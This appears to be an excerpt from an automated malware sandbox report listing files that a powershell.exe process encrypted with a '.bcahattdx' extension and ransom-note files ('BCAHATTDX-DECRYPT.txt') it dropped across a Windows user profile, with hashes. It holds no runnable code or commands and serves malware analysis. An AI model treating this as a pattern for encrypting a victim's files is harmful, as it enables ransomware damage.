MD5: eddf8f0814f29d40be7acaf351734cc1
SHA256: 209355581d6dab4b645260069d13d4ac9341944d6b91acc3eaeb0ab7bff11f66
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\AssetCache\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.bcahattdx
binary
MD5: fb346edcd337679b6cfa7f0417b91e6c
SHA256: f6bd64e8ac7024b1b093a9600b06b0fd90ad1a49df0cfa4b3203024435e68684
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.bcahattdx
binary
MD5: 65a8eb3924afae12e304013a57b1f13f
SHA256: 83a9085ee1f4f1da58997f055aeca5c9c19eb3d638944114d522c5b7b466d6f4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Collab\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Forms\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.bcahattdx
binary
MD5: 97d46982ed8c053f066327023a8be048
SHA256: f8c22006ea49ba92a1a8e846905f0fbb2f4d9f4f5bab89541e6840311711ff3d
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp.bcahattdx
binary
MD5: a516219d1292e3595a472c8831bb0257
SHA256: 4166ea1c7828e08c07df8afa4e7bff8dcf75c957d0d5ab96150cee93ffa768ef
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\.oracle_jre_usage\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF182f0a.TMP
binary
MD5: 2e6c332796340affbff5230455889d0d
SHA256: 6f83140e19865c73d28025cdce4dc60261ab057414157519a4a1aaa80df8540e
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 2e6c332796340affbff5230455889d0d
SHA256: 6f83140e19865c73d28025cdce4dc60261ab057414157519a4a1aaa80df8540e
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3GIYTCWY3I4ZMGHR936J.temp
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests